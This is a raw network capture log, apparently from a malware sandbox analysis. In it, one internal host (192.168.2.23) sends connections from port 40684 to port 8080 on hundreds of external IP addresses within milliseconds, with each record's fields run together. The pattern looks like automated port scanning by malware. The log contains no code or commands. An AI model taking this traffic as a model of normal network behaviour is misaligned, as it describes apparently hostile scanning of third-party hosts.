                                                            Feb 14, 2024 09:27:40.993139029 CET406848080192.168.2.2385.182.73.178
                                                            Feb 14, 2024 09:27:40.993139029 CET406848080192.168.2.2385.50.126.125
                                                            Feb 14, 2024 09:27:40.993144035 CET406848080192.168.2.2395.31.220.133
                                                            Feb 14, 2024 09:27:40.993148088 CET406848080192.168.2.2362.224.109.76
                                                            Feb 14, 2024 09:27:40.993148088 CET406848080192.168.2.2394.133.169.163
                                                            Feb 14, 2024 09:27:40.993148088 CET406848080192.168.2.2331.38.193.63
                                                            Feb 14, 2024 09:27:40.993151903 CET406848080192.168.2.2385.29.203.40
                                                            Feb 14, 2024 09:27:40.993151903 CET406848080192.168.2.2331.241.154.240
                                                            Feb 14, 2024 09:27:40.993155956 CET406848080192.168.2.2331.31.139.39
                                                            Feb 14, 2024 09:27:40.993156910 CET406848080192.168.2.2362.94.22.93
                                                            Feb 14, 2024 09:27:40.993156910 CET406848080192.168.2.2385.121.209.153
                                                            Feb 14, 2024 09:27:40.993163109 CET406848080192.168.2.2362.141.36.123
                                                            Feb 14, 2024 09:27:40.993163109 CET406848080192.168.2.2331.134.35.84
                                                            Feb 14, 2024 09:27:40.993169069 CET406848080192.168.2.2394.38.47.188
                                                            Feb 14, 2024 09:27:40.993175030 CET406848080192.168.2.2331.190.100.116
                                                            Feb 14, 2024 09:27:40.993176937 CET406848080192.168.2.2395.160.63.34
                                                            Feb 14, 2024 09:27:40.993176937 CET406848080192.168.2.2394.246.55.21
                                                            Feb 14, 2024 09:27:40.993177891 CET406848080192.168.2.2395.170.228.169
                                                            Feb 14, 2024 09:27:40.993177891 CET406848080192.168.2.2394.224.74.115
                                                            Feb 14, 2024 09:27:40.993177891 CET406848080192.168.2.2395.92.183.184
                                                            Feb 14, 2024 09:27:40.993181944 CET406848080192.168.2.2362.244.151.249
                                                            Feb 14, 2024 09:27:40.993181944 CET406848080192.168.2.2395.204.76.106
                                                            Feb 14, 2024 09:27:40.993191957 CET406848080192.168.2.2395.195.209.7
                                                            Feb 14, 2024 09:27:40.993191957 CET406848080192.168.2.2385.141.91.11
                                                            Feb 14, 2024 09:27:40.993191004 CET406848080192.168.2.2362.33.15.218
                                                            Feb 14, 2024 09:27:40.993191004 CET406848080192.168.2.2331.180.64.247
                                                            Feb 14, 2024 09:27:40.993202925 CET406848080192.168.2.2362.195.180.163
                                                            Feb 14, 2024 09:27:40.993191004 CET406848080192.168.2.2395.158.4.251
                                                            Feb 14, 2024 09:27:40.993191004 CET406848080192.168.2.2395.190.253.13
                                                            Feb 14, 2024 09:27:40.993215084 CET406848080192.168.2.2385.119.161.144
                                                            Feb 14, 2024 09:27:40.993217945 CET406848080192.168.2.2362.56.182.173
                                                            Feb 14, 2024 09:27:40.993225098 CET406848080192.168.2.2395.2.66.134
                                                            Feb 14, 2024 09:27:40.993228912 CET406848080192.168.2.2395.50.64.86
                                                            Feb 14, 2024 09:27:40.993259907 CET406848080192.168.2.2385.75.8.218
                                                            Feb 14, 2024 09:27:40.993300915 CET406848080192.168.2.2394.109.162.154
                                                            Feb 14, 2024 09:27:40.993300915 CET406848080192.168.2.2331.192.58.105
                                                            Feb 14, 2024 09:27:40.993303061 CET406848080192.168.2.2395.61.246.165
                                                            Feb 14, 2024 09:27:40.993303061 CET406848080192.168.2.2395.50.207.55
                                                            Feb 14, 2024 09:27:40.993304014 CET406848080192.168.2.2385.84.9.174
                                                            Feb 14, 2024 09:27:40.993303061 CET406848080192.168.2.2395.104.61.150
                                                            Feb 14, 2024 09:27:40.993304968 CET406848080192.168.2.2331.94.61.199
                                                            Feb 14, 2024 09:27:40.993303061 CET406848080192.168.2.2395.141.57.117
                                                            Feb 14, 2024 09:27:40.993304014 CET406848080192.168.2.2394.248.126.139
                                                            Feb 14, 2024 09:27:40.993304014 CET406848080192.168.2.2385.194.223.64
                                                            Feb 14, 2024 09:27:40.993303061 CET406848080192.168.2.2394.8.23.171
                                                            Feb 14, 2024 09:27:40.993303061 CET406848080192.168.2.2385.153.98.197
                                                            Feb 14, 2024 09:27:40.993320942 CET406848080192.168.2.2362.159.16.60
                                                            Feb 14, 2024 09:27:40.993321896 CET406848080192.168.2.2395.190.53.46
                                                            Feb 14, 2024 09:27:40.993324041 CET406848080192.168.2.2395.234.15.230
                                                            Feb 14, 2024 09:27:40.993324041 CET406848080192.168.2.2394.56.102.169
                                                            Feb 14, 2024 09:27:40.993321896 CET406848080192.168.2.2385.12.169.221
                                                            Feb 14, 2024 09:27:40.993324995 CET406848080192.168.2.2331.32.230.73
                                                            Feb 14, 2024 09:27:40.993324995 CET406848080192.168.2.2395.233.9.44
                                                            Feb 14, 2024 09:27:40.993321896 CET406848080192.168.2.2385.9.106.129
                                                            Feb 14, 2024 09:27:40.993324995 CET406848080192.168.2.2362.173.7.144
                                                            Feb 14, 2024 09:27:40.993321896 CET406848080192.168.2.2385.223.42.254
                                                            Feb 14, 2024 09:27:40.993324995 CET406848080192.168.2.2331.65.4.83
                                                            Feb 14, 2024 09:27:40.993321896 CET406848080192.168.2.2394.110.222.38
                                                            Feb 14, 2024 09:27:40.993321896 CET406848080192.168.2.2394.166.233.205
                                                            Feb 14, 2024 09:27:40.993323088 CET406848080192.168.2.2385.144.90.80
                                                            Feb 14, 2024 09:27:40.993323088 CET406848080192.168.2.2331.146.195.121
                                                            Feb 14, 2024 09:27:40.993335009 CET406848080192.168.2.2362.173.106.76
                                                            Feb 14, 2024 09:27:40.993335009 CET406848080192.168.2.2331.186.151.152
                                                            Feb 14, 2024 09:27:40.993339062 CET406848080192.168.2.2331.255.4.93
                                                            Feb 14, 2024 09:27:40.993355989 CET406848080192.168.2.2385.51.8.207
                                                            Feb 14, 2024 09:27:40.993357897 CET406848080192.168.2.2394.179.97.211
                                                            Feb 14, 2024 09:27:40.993360043 CET406848080192.168.2.2385.39.95.184
                                                            Feb 14, 2024 09:27:40.993366003 CET406848080192.168.2.2395.118.69.212
                                                            Feb 14, 2024 09:27:40.993371010 CET406848080192.168.2.2362.54.71.123
                                                            Feb 14, 2024 09:27:40.993380070 CET406848080192.168.2.2395.21.172.98
                                                            Feb 14, 2024 09:27:40.993381977 CET406848080192.168.2.2331.33.2.33
                                                            Feb 14, 2024 09:27:40.993392944 CET406848080192.168.2.2385.15.58.36
                                                            Feb 14, 2024 09:27:40.993403912 CET406848080192.168.2.2385.222.188.223
                                                            Feb 14, 2024 09:27:40.993405104 CET406848080192.168.2.2362.54.87.231
                                                            Feb 14, 2024 09:27:40.993405104 CET406848080192.168.2.2395.35.15.245
                                                            Feb 14, 2024 09:27:40.993405104 CET406848080192.168.2.2395.7.125.116
                                                            Feb 14, 2024 09:27:40.993417025 CET406848080192.168.2.2331.208.166.9
                                                            Feb 14, 2024 09:27:40.993419886 CET406848080192.168.2.2394.30.180.251
                                                            Feb 14, 2024 09:27:40.993433952 CET406848080192.168.2.2394.3.24.222
                                                            Feb 14, 2024 09:27:40.993434906 CET406848080192.168.2.2362.6.74.192
                                                            Feb 14, 2024 09:27:40.993438959 CET406848080192.168.2.2394.42.253.25
                                                            Feb 14, 2024 09:27:40.993447065 CET406848080192.168.2.2362.134.14.234
                                                            Feb 14, 2024 09:27:40.993522882 CET406848080192.168.2.2394.168.26.250
                                                            Feb 14, 2024 09:27:40.993522882 CET406848080192.168.2.2395.254.223.40
                                                            Feb 14, 2024 09:27:40.993522882 CET406848080192.168.2.2331.177.199.208
                                                            Feb 14, 2024 09:27:40.993522882 CET406848080192.168.2.2385.113.185.177
                                                            Feb 14, 2024 09:27:40.993522882 CET406848080192.168.2.2395.210.186.66
                                                            Feb 14, 2024 09:27:40.993525028 CET406848080192.168.2.2395.52.151.68
                                                            Feb 14, 2024 09:27:40.993525028 CET406848080192.168.2.2331.224.235.99
                                                            Feb 14, 2024 09:27:40.993525028 CET406848080192.168.2.2385.227.193.167
                                                            Feb 14, 2024 09:27:40.993525982 CET406848080192.168.2.2394.81.172.213
                                                            Feb 14, 2024 09:27:40.993525982 CET406848080192.168.2.2362.184.252.221
                                                            Feb 14, 2024 09:27:40.993525982 CET406848080192.168.2.2362.192.218.2
                                                            Feb 14, 2024 09:27:40.993534088 CET406848080192.168.2.2331.130.233.225
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2395.221.143.187
                                                            Feb 14, 2024 09:27:40.993534088 CET406848080192.168.2.2394.34.206.11
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2394.2.84.123
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2385.6.138.223
                                                            Feb 14, 2024 09:27:40.993534088 CET406848080192.168.2.2395.238.173.216
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2362.96.204.209
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2395.197.2.214
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2362.78.11.55
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2385.70.71.70
                                                            Feb 14, 2024 09:27:40.993535995 CET406848080192.168.2.2394.56.16.156
                                                            Feb 14, 2024 09:27:40.993547916 CET406848080192.168.2.2394.177.14.69
                                                            Feb 14, 2024 09:27:40.993547916 CET406848080192.168.2.2395.88.52.241
                                                            Feb 14, 2024 09:27:40.993541956 CET406848080192.168.2.2385.9.22.29
                                                            Feb 14, 2024 09:27:40.993534088 CET406848080192.168.2.2362.61.130.137
                                                            Feb 14, 2024 09:27:40.993541956 CET406848080192.168.2.2385.60.104.250
                                                            Feb 14, 2024 09:27:40.993535042 CET406848080192.168.2.2331.153.138.178
                                                            Feb 14, 2024 09:27:40.993551016 CET406848080192.168.2.2394.188.221.219
                                                            Feb 14, 2024 09:27:40.993552923 CET406848080192.168.2.2362.142.177.162
                                                            Feb 14, 2024 09:27:40.993551016 CET406848080192.168.2.2394.152.103.205
                                                            Feb 14, 2024 09:27:40.993541956 CET406848080192.168.2.2385.42.139.194
                                                            Feb 14, 2024 09:27:40.993556023 CET406848080192.168.2.2362.138.35.27
                                                            Feb 14, 2024 09:27:40.993552923 CET406848080192.168.2.2394.213.156.169
                                                            Feb 14, 2024 09:27:40.993541956 CET406848080192.168.2.2385.108.190.227
                                                            Feb 14, 2024 09:27:40.993556023 CET406848080192.168.2.2362.245.4.32
                                                            Feb 14, 2024 09:27:40.993556023 CET406848080192.168.2.2395.143.89.76
                                                            Feb 14, 2024 09:27:40.993560076 CET406848080192.168.2.2394.100.249.42
                                                            Feb 14, 2024 09:27:40.993560076 CET406848080192.168.2.2362.186.80.141
                                                            Feb 14, 2024 09:27:40.993566036 CET406848080192.168.2.2362.66.14.198
                                                            Feb 14, 2024 09:27:40.993566036 CET406848080192.168.2.2385.140.143.109
                                                            Feb 14, 2024 09:27:40.993571997 CET406848080192.168.2.2331.77.83.209
                                                            Feb 14, 2024 09:27:40.993571997 CET406848080192.168.2.2395.218.224.125
                                                            Feb 14, 2024 09:27:40.993571997 CET406848080192.168.2.2362.123.16.245
                                                            Feb 14, 2024 09:27:40.993601084 CET406848080192.168.2.2394.61.80.165
                                                            Feb 14, 2024 09:27:40.993607998 CET406848080192.168.2.2394.171.197.13
                                                            Feb 14, 2024 09:27:40.993613005 CET406848080192.168.2.2385.184.64.35
                                                            Feb 14, 2024 09:27:40.993613958 CET406848080192.168.2.2362.104.229.250
                                                            Feb 14, 2024 09:27:40.993616104 CET406848080192.168.2.2362.227.175.174
                                                            Feb 14, 2024 09:27:40.993618011 CET406848080192.168.2.2395.113.255.220
                                                            Feb 14, 2024 09:27:40.993618011 CET406848080192.168.2.2394.23.112.170
                                                            Feb 14, 2024 09:27:40.993618011 CET406848080192.168.2.2331.75.208.104
                                                            Feb 14, 2024 09:27:40.993628025 CET406848080192.168.2.2385.64.195.93
                                                            Feb 14, 2024 09:27:40.993628025 CET406848080192.168.2.2395.187.210.126
                                                            Feb 14, 2024 09:27:40.993630886 CET406848080192.168.2.2331.108.7.163
                                                            Feb 14, 2024 09:27:40.993630886 CET406848080192.168.2.2331.17.150.216
                                                            Feb 14, 2024 09:27:40.993633032 CET406848080192.168.2.2395.113.85.133
                                                            Feb 14, 2024 09:27:40.993658066 CET406848080192.168.2.2385.193.46.31
                                                            Feb 14, 2024 09:27:40.993665934 CET406848080192.168.2.2385.131.111.219
                                                            Feb 14, 2024 09:27:40.993669987 CET406848080192.168.2.2362.50.184.154
                                                            Feb 14, 2024 09:27:40.993678093 CET406848080192.168.2.2331.13.154.126
                                                            Feb 14, 2024 09:27:40.993679047 CET406848080192.168.2.2362.32.185.181
                                                            Feb 14, 2024 09:27:40.993679047 CET406848080192.168.2.2362.32.210.103
                                                            Feb 14, 2024 09:27:40.993680000 CET406848080192.168.2.2362.53.174.247
                                                            Feb 14, 2024 09:27:40.993680954 CET406848080192.168.2.2331.67.76.220
                                                            Feb 14, 2024 09:27:40.993680000 CET406848080192.168.2.2385.46.87.189
                                                            Feb 14, 2024 09:27:40.993680000 CET406848080192.168.2.2331.135.133.32
                                                            Feb 14, 2024 09:27:40.993680000 CET406848080192.168.2.2362.122.61.44
                                                            Feb 14, 2024 09:27:40.993680000 CET406848080192.168.2.2331.247.118.191
                                                            Feb 14, 2024 09:27:40.993690014 CET406848080192.168.2.2395.84.20.128
                                                            Feb 14, 2024 09:27:40.993694067 CET406848080192.168.2.2394.215.64.219
                                                            Feb 14, 2024 09:27:40.993761063 CET406848080192.168.2.2362.55.144.242
                                                            Feb 14, 2024 09:27:40.993763924 CET406848080192.168.2.2385.254.82.185
                                                            Feb 14, 2024 09:27:40.993763924 CET406848080192.168.2.2394.155.143.157
                                                            Feb 14, 2024 09:27:40.993763924 CET406848080192.168.2.2394.47.91.246
                                                            Feb 14, 2024 09:27:40.993769884 CET406848080192.168.2.2331.193.120.223
                                                            Feb 14, 2024 09:27:40.993769884 CET406848080192.168.2.2331.100.118.22
                                                            Feb 14, 2024 09:27:40.993772030 CET406848080192.168.2.2385.153.49.197
                                                            Feb 14, 2024 09:27:40.993772030 CET406848080192.168.2.2394.13.68.6
                                                            Feb 14, 2024 09:27:40.993772030 CET406848080192.168.2.2385.160.203.116
                                                            Feb 14, 2024 09:27:40.993772984 CET406848080192.168.2.2385.12.59.106
                                                            Feb 14, 2024 09:27:40.993772984 CET406848080192.168.2.2331.50.112.119
                                                            Feb 14, 2024 09:27:40.993772984 CET406848080192.168.2.2394.236.105.175
                                                            Feb 14, 2024 09:27:40.993788004 CET406848080192.168.2.2385.77.205.108
                                                            Feb 14, 2024 09:27:40.993788004 CET406848080192.168.2.2394.239.35.76
                                                            Feb 14, 2024 09:27:40.993788004 CET406848080192.168.2.2395.177.214.93
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2395.34.159.85
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2331.146.202.149
                                                            Feb 14, 2024 09:27:40.993788004 CET406848080192.168.2.2362.207.109.124
                                                            Feb 14, 2024 09:27:40.993797064 CET406848080192.168.2.2362.31.212.87
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2385.52.64.145
                                                            Feb 14, 2024 09:27:40.993798018 CET406848080192.168.2.2331.120.235.100
                                                            Feb 14, 2024 09:27:40.993801117 CET406848080192.168.2.2385.222.12.13
                                                            Feb 14, 2024 09:27:40.993798018 CET406848080192.168.2.2385.29.29.240
                                                            Feb 14, 2024 09:27:40.993801117 CET406848080192.168.2.2394.173.203.141
                                                            Feb 14, 2024 09:27:40.993799925 CET406848080192.168.2.2395.250.232.20
                                                            Feb 14, 2024 09:27:40.993801117 CET406848080192.168.2.2394.225.127.144
                                                            Feb 14, 2024 09:27:40.993799925 CET406848080192.168.2.2362.118.57.213
                                                            Feb 14, 2024 09:27:40.993798018 CET406848080192.168.2.2331.212.255.113
                                                            Feb 14, 2024 09:27:40.993798018 CET406848080192.168.2.2385.20.107.215
                                                            Feb 14, 2024 09:27:40.993799925 CET406848080192.168.2.2394.238.135.166
                                                            Feb 14, 2024 09:27:40.993810892 CET406848080192.168.2.2395.153.235.133
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2331.81.209.155
                                                            Feb 14, 2024 09:27:40.993817091 CET406848080192.168.2.2331.136.239.161
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2394.7.4.95
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2331.81.2.178
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2385.102.83.146
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2362.241.11.21
                                                            Feb 14, 2024 09:27:40.993793964 CET406848080192.168.2.2385.183.189.144
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2394.240.253.215
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2331.255.122.114
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2394.132.198.235
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2362.9.103.198
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2362.51.23.62
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2385.148.246.201
                                                            Feb 14, 2024 09:27:40.993818998 CET406848080192.168.2.2394.226.61.176
                                                            Feb 14, 2024 09:27:40.993827105 CET406848080192.168.2.2385.91.61.171
                                                            Feb 14, 2024 09:27:40.993827105 CET406848080192.168.2.2385.104.252.222
                                                            Feb 14, 2024 09:27:40.993827105 CET406848080192.168.2.2362.181.57.20
                                                            Feb 14, 2024 09:27:40.993827105 CET406848080192.168.2.2385.125.134.40
                                                            Feb 14, 2024 09:27:40.993830919 CET406848080192.168.2.2395.122.146.66
                                                            Feb 14, 2024 09:27:40.993830919 CET406848080192.168.2.2385.11.153.75
                                                            Feb 14, 2024 09:27:40.993830919 CET406848080192.168.2.2385.183.219.12
                                                            Feb 14, 2024 09:27:40.993834972 CET406848080192.168.2.2394.194.244.97
                                                            Feb 14, 2024 09:27:40.993834972 CET406848080192.168.2.2362.155.24.116
                                                            Feb 14, 2024 09:27:40.993834972 CET406848080192.168.2.2385.219.55.26
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2394.34.132.229
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2331.1.8.6
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2385.61.242.98
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2395.148.26.189
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2394.52.34.233
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2394.241.82.180
                                                            Feb 14, 2024 09:27:40.993850946 CET406848080192.168.2.2385.22.81.36
                                                            Feb 14, 2024 09:27:40.993865013 CET406848080192.168.2.2362.43.19.246
                                                            Feb 14, 2024 09:27:40.993866920 CET406848080192.168.2.2394.112.54.85
                                                            Feb 14, 2024 09:27:40.993866920 CET406848080192.168.2.2331.39.216.235
                                                            Feb 14, 2024 09:27:40.993866920 CET406848080192.168.2.2395.188.246.118
                                                            Feb 14, 2024 09:27:40.993866920 CET406848080192.168.2.2385.190.109.216
                                                            Feb 14, 2024 09:27:40.993870974 CET406848080192.168.2.2385.147.218.137
                                                            Feb 14, 2024 09:27:40.993895054 CET406848080192.168.2.2331.110.96.124
                                                            Feb 14, 2024 09:27:40.993911982 CET406848080192.168.2.2385.52.146.47
                                                            Feb 14, 2024 09:27:40.993915081 CET406848080192.168.2.2362.0.241.23
                                                            Feb 14, 2024 09:27:40.993917942 CET406848080192.168.2.2395.31.70.100
                                                            Feb 14, 2024 09:27:40.993940115 CET406848080192.168.2.2331.175.201.94
                                                            Feb 14, 2024 09:27:40.993943930 CET406848080192.168.2.2395.222.183.77
                                                            Feb 14, 2024 09:27:40.993949890 CET406848080192.168.2.2395.3.21.67
                                                            Feb 14, 2024 09:27:40.993949890 CET406848080192.168.2.2331.162.190.23
                                                            Feb 14, 2024 09:27:40.993949890 CET406848080192.168.2.2362.109.218.237
                                                            Feb 14, 2024 09:27:40.993952036 CET406848080192.168.2.2362.16.24.253
                                                            Feb 14, 2024 09:27:40.993949890 CET406848080192.168.2.2395.29.72.74
                                                            Feb 14, 2024 09:27:40.993949890 CET406848080192.168.2.2395.208.36.4
                                                            Feb 14, 2024 09:27:40.993957996 CET406848080192.168.2.2395.25.41.213
                                                            Feb 14, 2024 09:27:40.993964911 CET406848080192.168.2.2362.76.130.118
                                                            Feb 14, 2024 09:27:40.993964911 CET406848080192.168.2.2331.6.19.234
                                                            Feb 14, 2024 09:27:40.993968010 CET406848080192.168.2.2395.118.194.38
                                                            Feb 14, 2024 09:27:40.993966103 CET406848080192.168.2.2385.228.221.147
                                                            Feb 14, 2024 09:27:40.993966103 CET406848080192.168.2.2395.82.205.21
                                                            Feb 14, 2024 09:27:40.993978977 CET406848080192.168.2.2395.240.137.71
                                                            Feb 14, 2024 09:27:40.994007111 CET406848080192.168.2.2395.222.213.79
                                                            Feb 14, 2024 09:27:40.994007111 CET406848080192.168.2.2395.13.142.217
                                                            Feb 14, 2024 09:27:40.994008064 CET406848080192.168.2.2395.79.110.214
                                                            Feb 14, 2024 09:27:40.994014025 CET406848080192.168.2.2395.51.249.48
                                                            Feb 14, 2024 09:27:40.994019985 CET406848080192.168.2.2394.29.19.248
                                                            Feb 14, 2024 09:27:40.994092941 CET406848080192.168.2.2385.64.183.8
                                                            Feb 14, 2024 09:27:40.994095087 CET406848080192.168.2.2331.211.101.9
                                                            Feb 14, 2024 09:27:40.994097948 CET406848080192.168.2.2362.41.133.240
                                                            Feb 14, 2024 09:27:40.994107008 CET406848080192.168.2.2395.23.248.91
                                                            Feb 14, 2024 09:27:40.994107008 CET406848080192.168.2.2385.183.216.236
                                                            Feb 14, 2024 09:27:40.994123936 CET406848080192.168.2.2362.161.0.94
                                                            Feb 14, 2024 09:27:40.994123936 CET406848080192.168.2.2394.255.254.22
                                                            Feb 14, 2024 09:27:40.994133949 CET406848080192.168.2.2395.148.239.14
                                                            Feb 14, 2024 09:27:40.994153023 CET406848080192.168.2.2385.239.18.167
                                                            Feb 14, 2024 09:27:40.994157076 CET406848080192.168.2.2331.43.11.123
                                                            Feb 14, 2024 09:27:40.994159937 CET406848080192.168.2.2394.32.234.113
                                                            Feb 14, 2024 09:27:40.994173050 CET406848080192.168.2.2395.64.130.229
                                                            Feb 14, 2024 09:27:40.994174004 CET406848080192.168.2.2395.34.200.110
                                                            Feb 14, 2024 09:27:40.994175911 CET406848080192.168.2.2395.188.12.137
                                                            Feb 14, 2024 09:27:40.994184971 CET406848080192.168.2.2331.131.47.221
                                                            Feb 14, 2024 09:27:40.994185925 CET406848080192.168.2.2395.26.239.167
                                                            Feb 14, 2024 09:27:40.994206905 CET406848080192.168.2.2331.210.171.1
                                                            Feb 14, 2024 09:27:40.994221926 CET406848080192.168.2.2331.216.253.21
                                                            Feb 14, 2024 09:27:40.994220972 CET406848080192.168.2.2362.93.75.249
                                                            Feb 14, 2024 09:27:40.994225025 CET406848080192.168.2.2394.81.205.250
                                                            Feb 14, 2024 09:27:40.994229078 CET406848080192.168.2.2362.82.104.62
                                                            Feb 14, 2024 09:27:40.994230986 CET406848080192.168.2.2394.240.123.193
                                                            Feb 14, 2024 09:27:40.994249105 CET406848080192.168.2.2331.187.120.19
                                                            Feb 14, 2024 09:27:40.994255066 CET406848080192.168.2.2362.170.211.94
                                                            Feb 14, 2024 09:27:40.994257927 CET406848080192.168.2.2395.248.7.153
                                                            Feb 14, 2024 09:27:40.994266033 CET406848080192.168.2.2385.6.82.125
                                                            Feb 14, 2024 09:27:40.994278908 CET406848080192.168.2.2394.60.185.254
                                                            Feb 14, 2024 09:27:40.994280100 CET406848080192.168.2.2385.88.188.185
                                                            Feb 14, 2024 09:27:40.994282007 CET406848080192.168.2.2362.117.65.176
                                                            Feb 14, 2024 09:27:40.994288921 CET406848080192.168.2.2394.58.179.29
                                                            Feb 14, 2024 09:27:40.994318008 CET406848080192.168.2.2385.147.198.18
                                                            Feb 14, 2024 09:27:40.994333029 CET406848080192.168.2.2395.169.174.122
                                                            Feb 14, 2024 09:27:40.994354963 CET406848080192.168.2.2395.246.188.165
                                                            Feb 14, 2024 09:27:40.994355917 CET406848080192.168.2.2362.140.45.120
                                                            Feb 14, 2024 09:27:40.994355917 CET406848080192.168.2.2331.163.173.100
                                                            Feb 14, 2024 09:27:40.994357109 CET406848080192.168.2.2394.77.12.253
                                                            Feb 14, 2024 09:27:40.994358063 CET406848080192.168.2.2331.78.26.178
                                                            Feb 14, 2024 09:27:40.994363070 CET406848080192.168.2.2385.255.41.83
                                                            Feb 14, 2024 09:27:40.994379044 CET406848080192.168.2.2395.75.125.82
                                                            Feb 14, 2024 09:27:40.994383097 CET406848080192.168.2.2331.240.163.127
                                                            Feb 14, 2024 09:27:40.994383097 CET406848080192.168.2.2385.55.171.177
                                                            Feb 14, 2024 09:27:40.994390011 CET406848080192.168.2.2385.232.223.35
                                                            Feb 14, 2024 09:27:40.994400024 CET406848080192.168.2.2331.110.207.64
                                                            Feb 14, 2024 09:27:40.994426012 CET406848080192.168.2.2394.64.53.188
                                                            Feb 14, 2024 09:27:40.994431019 CET406848080192.168.2.2362.155.200.230
                                                            Feb 14, 2024 09:27:40.994432926 CET406848080192.168.2.2395.59.169.19
                                                            Feb 14, 2024 09:27:40.994432926 CET406848080192.168.2.2395.4.220.207
                                                            Feb 14, 2024 09:27:40.994453907 CET406848080192.168.2.2385.93.88.253
                                                            Feb 14, 2024 09:27:40.994457006 CET406848080192.168.2.2362.80.58.214
                                                            Feb 14, 2024 09:27:40.994461060 CET406848080192.168.2.2395.92.21.0
                                                            Feb 14, 2024 09:27:40.994461060 CET406848080192.168.2.2394.162.181.203
                                                            Feb 14, 2024 09:27:40.994462967 CET406848080192.168.2.2385.253.11.134
                                                            Feb 14, 2024 09:27:40.994466066 CET406848080192.168.2.2331.76.137.214
                                                            Feb 14, 2024 09:27:40.994474888 CET406848080192.168.2.2385.221.90.208
                                                            Feb 14, 2024 09:27:40.994492054 CET406848080192.168.2.2331.182.133.64
                                                            Feb 14, 2024 09:27:40.994492054 CET406848080192.168.2.2385.211.124.218
                                                            Feb 14, 2024 09:27:40.994497061 CET406848080192.168.2.2385.236.128.105
                                                            Feb 14, 2024 09:27:40.994505882 CET406848080192.168.2.2394.124.207.87
                                                            Feb 14, 2024 09:27:40.994505882 CET406848080192.168.2.2331.95.75.61
                                                            Feb 14, 2024 09:27:40.994505882 CET406848080192.168.2.2385.82.152.91
                                                            Feb 14, 2024 09:27:40.994514942 CET406848080192.168.2.2394.135.126.249
                                                            Feb 14, 2024 09:27:40.994515896 CET406848080192.168.2.2385.120.79.195
                                                            Feb 14, 2024 09:27:40.994524956 CET406848080192.168.2.2395.91.237.67
                                                            Feb 14, 2024 09:27:40.994534969 CET406848080192.168.2.2394.9.41.69
                                                            Feb 14, 2024 09:27:40.994540930 CET406848080192.168.2.2331.73.243.0
                                                            Feb 14, 2024 09:27:40.994544029 CET406848080192.168.2.2385.130.128.247
                                                            Feb 14, 2024 09:27:40.994544983 CET406848080192.168.2.2394.104.25.203
                                                            Feb 14, 2024 09:27:40.994553089 CET406848080192.168.2.2395.77.212.50
                                                            Feb 14, 2024 09:27:40.994555950 CET406848080192.168.2.2362.245.16.75
                                                            Feb 14, 2024 09:27:40.994566917 CET406848080192.168.2.2385.130.30.237
                                                            Feb 14, 2024 09:27:40.994570017 CET406848080192.168.2.2331.99.162.251
                                                            Feb 14, 2024 09:27:40.994571924 CET406848080192.168.2.2385.26.78.21
                                                            Feb 14, 2024 09:27:40.994571924 CET406848080192.168.2.2395.243.58.13
                                                            Feb 14, 2024 09:27:40.994586945 CET406848080192.168.2.2395.161.190.72
                                                            Feb 14, 2024 09:27:40.994587898 CET406848080192.168.2.2331.65.99.151
                                                            Feb 14, 2024 09:27:40.994587898 CET406848080192.168.2.2394.180.33.193
                                                            Feb 14, 2024 09:27:40.994596958 CET406848080192.168.2.2385.220.74.73
                                                            Feb 14, 2024 09:27:40.994602919 CET406848080192.168.2.2385.60.71.84
                                                            Feb 14, 2024 09:27:40.994607925 CET406848080192.168.2.2394.159.247.86
                                                            Feb 14, 2024 09:27:40.994611025 CET406848080192.168.2.2331.46.128.54
                                                            Feb 14, 2024 09:27:40.994622946 CET406848080192.168.2.2362.184.243.175
                                                            Feb 14, 2024 09:27:40.994630098 CET406848080192.168.2.2394.182.237.69
                                                            Feb 14, 2024 09:27:40.994636059 CET406848080192.168.2.2331.197.89.78
                                                            Feb 14, 2024 09:27:40.994636059 CET406848080192.168.2.2362.169.170.128
                                                            Feb 14, 2024 09:27:40.994638920 CET406848080192.168.2.2362.62.220.100
                                                            Feb 14, 2024 09:27:40.994643927 CET406848080192.168.2.2385.44.251.91
                                                            Feb 14, 2024 09:27:40.994653940 CET406848080192.168.2.2331.113.183.209
                                                            Feb 14, 2024 09:27:40.994654894 CET406848080192.168.2.2331.95.145.106
                                                            Feb 14, 2024 09:27:40.994662046 CET406848080192.168.2.2395.0.151.109
                                                            Feb 14, 2024 09:27:40.994664907 CET406848080192.168.2.2394.255.248.229
                                                            Feb 14, 2024 09:27:40.994683027 CET406848080192.168.2.2362.153.51.78
                                                            Feb 14, 2024 09:27:40.994683981 CET406848080192.168.2.2362.82.254.74
                                                            Feb 14, 2024 09:27:40.994683027 CET406848080192.168.2.2385.161.44.16
                                                            Feb 14, 2024 09:27:40.994688988 CET406848080192.168.2.2394.146.2.128
                                                            Feb 14, 2024 09:27:40.994690895 CET406848080192.168.2.2394.163.95.21
